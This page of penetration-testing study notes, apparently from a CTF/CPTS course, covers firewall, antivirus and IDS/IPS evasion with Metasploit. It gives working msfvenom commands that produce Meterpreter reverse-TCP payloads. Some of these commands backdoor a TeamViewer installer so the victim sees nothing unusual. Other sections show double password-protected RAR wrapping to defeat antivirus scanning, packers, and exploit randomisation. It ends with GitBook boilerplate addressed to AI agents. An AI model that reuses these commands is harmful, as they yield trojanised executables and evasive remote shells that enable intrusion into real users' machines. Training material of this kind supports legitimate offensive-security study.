> For the complete documentation index, see [llms.txt](https://capcap-1.gitbook.io/capcap/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://capcap-1.gitbook.io/capcap/readme/ctf-modules/vulnerability-assessment/msf/firewall-and-ids-ips-evasion.md).

# Firewall & IDS/IPS Evasion

**Two Types of Protection to Understand**

**Endpoint Protection** — software on the device itself (Avast, Malwarebytes, BitDefender). Protects a single host. Includes AV, antimalware, firewall all in one package.

**Perimeter Protection** — physical/virtual devices at the network edge. Controls what enters/exits the network. Often sits between Internet → DMZ → Internal network.

***

**How Detection Works**

| Method                         | How it catches you                                                                                 |
| ------------------------------ | -------------------------------------------------------------------------------------------------- |
| **Signature-based**            | Matches your payload/traffic against known attack patterns. 100% match = alarm. Most common in AV. |
| **Heuristic/Anomaly**          | Compares behavior against a baseline. Anything unusual = alarm. Catches unknown threats.           |
| **Stateful Protocol Analysis** | Checks if traffic follows normal protocol behavior.                                                |
| **SOC/Live Monitoring**        | Humans watching live traffic dashboards. Hardest to evade.                                         |

***

**Evasion Techniques**

**1. Encoding (Limited effectiveness now)**

Basic encoding with `shikata_ga_nai` — detected by 11/59 AV engines raw. Modern AV uses heuristics so encoding alone isn't enough anymore. Still useful for removing bad characters.

**2. Backdoored Executables (Better)**

Embed payload inside a legitimate executable:

```bash
msfvenom windows/x86/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=8080 \
-k \                          # keep original program running
-x ~/Downloads/TeamViewer_Setup.exe \   # template executable
-e x86/shikata_ga_nai \       # encoder
-a x86 --platform windows \
-o ~/Desktop/TeamViewer_Setup.exe \
-i 5                          # 5 encoding iterations
```

The `-k` flag runs the payload in a separate thread so the real program still opens normally — less suspicious to the user.

> **Note on `-k`:** If target runs it from CLI, a separate window pops up briefly. From GUI it's seamless.

**3. Password-Protected Archives (Very Effective)**

Wrapping payload in encrypted archive bypasses most AV signatures entirely because AV **can't scan inside encrypted archives**.

```bash
# Generate payload
msfvenom ... -o test.js

# Archive with password
rar a ~/test.rar -p ~/test.js    # password protect

# Remove extension (extra obfuscation)
mv test.rar test

# Archive again with password
rar a test2.rar -p test

# Remove extension again
mv test2.rar test2
```

Result: **0/49** detections on VirusTotal vs **11/59** raw.

Downside — AV dashboards flag it as "unable to scan" which alerts admins. Trade-off between evasion and stealth.

**4. Packers**

Compress + encrypt the entire executable structure. The packer decompresses at runtime transparently.

Popular packers: **UPX**, **Enigma Protector**, **Themida**, **MPRESS**

**5. Exploit Code Randomization**

For custom buffer overflow exploits — randomize offset values and avoid obvious NOP sleds (`\x90\x90\x90...`) since IDS signatures specifically look for these patterns:

```ruby
'Targets' => [
    [ 'Windows 2000 SP4', { 'Ret' => 0x77e14c29, 'Offset' => 5093 } ],
],
```

***

**What MSF6 Does Automatically**

Meterpreter traffic is **AES encrypted** out of the box in MSF6. This handles most network-based IDS/IPS since they can't inspect encrypted traffic. Combined with Meterpreter running **in memory only**, forensic detection becomes very difficult.

***

**Checking Detection Rate**

```bash
msf-virustotal -k <API_key> -f test.js
```

Tests your payload against 50+ AV engines. Useful for gauging detection before deployment.

> **Important:** Never submit actual client engagement payloads to VirusTotal — it's a public service and submissions are shared with AV vendors, which would update their signatures.

***

**Key Takeaways**

* Raw msfvenom payloads will get caught by modern AV — always consider evasion
* Backdoored executables + encoding = better than encoding alone
* Password-protected archives = very effective but raises admin alerts
* Meterpreter AES encryption handles network-level detection automatically
* Deep evasion (custom packers, polymorphic code) is covered in later modules — this is just the intro

**Four Evasion Methods — Ranked by Effectiveness**

**Method 1 — Encoding (Weakest)**

```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.2 LPORT=4444 \
-e x86/shikata_ga_nai -i 5 \    # encode 5 times
-f exe > shell.exe
```

Result: Still detected by \~11/59 AV engines. Modern AV uses behavior analysis, not just signatures. Encoding alone is not enough but helps remove bad characters.

**Method 2 — Backdoored Executable (Better)**

```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.2 LPORT=4444 \
-x TeamViewer_Setup.exe \    # hide inside real program
-k \                         # keep real program running too
-e x86/shikata_ga_nai -i 5 \
-f exe > TeamViewer_Setup.exe
```

Payload is buried inside legitimate code. Much harder to detect. The `-k` flag means when victim runs it, **TeamViewer actually opens** — nothing looks suspicious.

**Method 3 — Password Protected Archive (Very Effective)**

```bash
# Wrap payload in encrypted RAR twice, remove extension
rar a test.rar -p test.js     # password protect
mv test.rar test               # remove extension
rar a test2.rar -p test        # archive again
mv test2.rar test2             # remove extension again
```

Result: **0/49** AV detections.

Why it works: AV **cannot scan inside encrypted archives** — it literally can't see the payload.

Downside: AV logs show "unable to scan this file" which alerts admins. So you're invisible to AV but possibly visible to a human analyst.

**Method 4 — Packers (Advanced)** Tools like UPX, Themida compress + encrypt the entire executable. Payload decompresses at runtime. Adds another layer on top of everything else. Not something you manually do in CPTS but know it exists.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://capcap-1.gitbook.io/capcap/readme/ctf-modules/vulnerability-assessment/msf/firewall-and-ids-ips-evasion.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
